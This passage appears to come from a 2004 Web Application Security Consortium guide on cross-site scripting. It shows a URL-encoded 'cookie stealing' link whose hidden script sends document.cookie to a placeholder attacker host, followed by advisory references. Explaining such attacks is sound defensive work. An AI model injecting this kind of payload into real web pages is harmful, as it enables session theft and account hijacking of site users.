URL Encoded example of Cookie Stealing URL:
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E
Decoded example of Cookie Stealing URL:
http://portal.example/index.php?sessionid=12312312&
username=
References
CERT Advisory CA 2000 02 Malicious HTML Tags Embedded in
Client Web Requests
http://www.cert.org/advisories/CA 2000 02.html
The Cross Site Scripting FAQ CGISecurity.com
http://www.cgisecurity.com/articles/xss faq.shtml
Cross Site Scripting Info
http://httpd.apache.org/info/css security/
24 Character entity references in HTML 4
http://www.w3.org/TR/html4/sgml/entities.html
Understanding Malicious Content Mitigation for Web Developers
http://www.cert.org/tech_tips/malicious_code_mitigation.html
Cross site Scripting: Are your web applications vulnerable? , By
Kevin Spett SPI Dynamics
26
Copyright 2004, Web Application Security Consortium. All rights reserved.
Unlimited Web Hosting
|
|
|
|
TotalRoute.net Business web hosting division of Vision Web Hosting Inc. All rights reserved. |